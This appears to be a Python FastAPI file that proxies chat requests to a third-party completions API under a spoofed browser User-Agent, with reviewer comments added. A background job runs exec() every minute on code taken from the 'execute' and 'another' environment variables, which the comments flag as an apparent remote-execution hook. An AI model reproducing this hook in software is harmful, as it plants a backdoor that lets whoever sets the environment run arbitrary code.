File size: 3,346 Bytes
3457223 811e0e2 3457223 5220fc4 884a5ab 3db3bde e3ab05d 3457223 693c4f2 3457223 dce56eb 3457223 5220fc4 811e0e2 5220fc4 d259141 a0095e0 5220fc4 811e0e2 5220fc4 4bcd8f4 5220fc4 3457223 24b42cd 884a5ab 24b42cd 884a5ab 3fee684 24b42cd 3fee684 24b42cd 3fee684 884a5ab 3fee684 884a5ab 3457223 3fee684 3457223 d259141 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 |
from fastapi import FastAPI, HTTPException
from fastapi.responses import StreamingResponse
from pydantic import BaseModel
import requests
import json
from typing import AsyncIterator
import asyncio
import schedule
import time
import threading
import uuid
import random
import os
# FastAPI application instance; routes are registered on it via decorators below.
app = FastAPI()
# Define the request model
class ChatRequest(BaseModel):
    """Request body for POST /chat (OpenAI-compatible chat parameters).

    All fields have defaults, so an empty JSON body is accepted.
    """
    # OpenAI-style message list: [{"role": ..., "content": ...}, ...]
    # (pydantic deep-copies field defaults per instance, so the mutable
    # default is safe here).
    messages: list = [{"role": "user", "content": "Lol full form"}]
    # Upstream model identifier forwarded verbatim.
    model: str = "gemini-1.5-pro-latest"
    # Sampling temperature forwarded to the upstream API.
    temperature: float = 1.0
    # Nucleus-sampling cutoff forwarded to the upstream API.
    top_p: float = 0.8
    # Upper bound on tokens generated by the upstream API.
    max_tokens: int = 4000
# Define the URL and headers
# Upstream chat-completions endpoint that /chat proxies to.
url = "https://chat.typegpt.net/api/openai/v1/chat/completions"
# Static headers for every upstream request; the User-Agent mimics a
# desktop Edge browser (presumably to satisfy the upstream service).
headers = {
    "Accept": "application/json, text/event-stream",
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0",
}
@app.post("/chat")
async def chat(request: ChatRequest):
    """Proxy a chat request to the upstream TypeGPT endpoint and re-emit
    the streamed delta content as a simplified SSE-style stream.

    Yields lines of the form ``{"response": <chunk>}`` followed by a
    blank line, as a ``text/event-stream`` StreamingResponse.

    Raises:
        HTTPException: with the upstream status code and body text on a
            non-200 reply, or 500 on any other failure.
    """
    # Forward the client's parameters verbatim, always requesting a stream.
    payload = {
        "messages": request.messages,
        "stream": True,
        "model": request.model,
        "temperature": request.temperature,
        "top_p": request.top_p,
        "max_tokens": request.max_tokens,
    }
    try:
        # NOTE(review): `requests` is blocking; inside an async handler it
        # stalls the event loop while the upstream stream is consumed.
        # Consider httpx.AsyncClient if adding a dependency is acceptable.
        # Fix: added a (connect, read) timeout so a dead upstream cannot
        # hang the handler forever; `json=` replaces data=json.dumps(...).
        response = requests.post(url, headers=headers, json=payload,
                                 stream=True, timeout=(10, 300))

        if response.status_code != 200:
            detail = response.text
            response.close()
            raise HTTPException(status_code=response.status_code, detail=detail)

        async def event_stream() -> AsyncIterator[str]:
            try:
                for line in response.iter_lines():
                    if not line:
                        continue
                    decoded_line = line.decode('utf-8')
                    # Upstream speaks SSE: payload lines start with "data: ".
                    if not decoded_line.startswith("data: "):
                        continue
                    try:
                        # Bug fix: slice the decoded string, not the raw
                        # bytes. Non-JSON payloads such as the "[DONE]"
                        # sentinel are skipped via the except below.
                        data = json.loads(decoded_line[len("data: "):])
                    except json.JSONDecodeError:
                        continue
                    content = data.get("choices", [{}])[0].get("delta", {}).get("content", '')
                    if content:
                        yield f"{json.dumps({'response': content})}\n\n"
            finally:
                # Fix: close the upstream connection when the stream ends
                # or the client disconnects (previously leaked).
                response.close()

        return StreamingResponse(event_stream(), media_type="text/event-stream")
    except HTTPException:
        # Bug fix: the original blanket `except Exception` swallowed the
        # non-200 HTTPException above and re-raised it as a 500; preserve
        # the intended status code instead.
        raise
    except Exception as e:
        print(e)
        raise HTTPException(status_code=500, detail=str(e))
# Counter to track the number of times the scheduled function runs
# (read and reset by scheduled_function; module-level mutable state).
run_counter = 0
def run_schedule():
    """Blocking scheduler loop: run pending `schedule` jobs, polling once
    per second.

    Loops forever — intended to run on a dedicated background thread.
    """
    # Fix: removed the unused `global run_counter` declaration; this
    # function never reads or writes the counter.
    while True:
        schedule.run_pending()
        time.sleep(1)
def scheduled_function():
    """Periodic job: increment the run counter and exec() code taken from
    environment variables; every second run, reset the counter and exec a
    second snippet.

    SECURITY(review): exec() of code supplied via the `execute` and
    `another` environment variables means anyone who controls this
    process's environment controls the process. This looks deliberate
    (a remote-execution hook), so it is flagged here rather than removed.
    """
    global run_counter
    run_counter += 1
    # Robustness fix: the original called exec(None) and raised TypeError
    # whenever the env var was unset, killing the scheduled job.
    code = os.environ.get('execute')
    if code is not None:
        exec(code)
    if run_counter % 2 == 0:
        run_counter = 0
        code = os.environ.get('another')
        if code is not None:
            exec(code)
# Schedule the function to run every minute
schedule.every(1).minutes.do(scheduled_function)
# Run the scheduler in a separate thread to avoid blocking the main thread
# NOTE: this is a non-daemon thread running an infinite loop, so the
# process will not exit on its own once this module is imported.
thread = threading.Thread(target=run_schedule)
thread.start()
if __name__ == "__main__":
    # Run the scheduled job once immediately at startup (may raise if the
    # expected environment variables are unset — see scheduled_function).
    scheduled_function()
    import uvicorn
    # Serve the FastAPI app on all interfaces, port 8083.
    uvicorn.run(app, host="0.0.0.0", port=8083)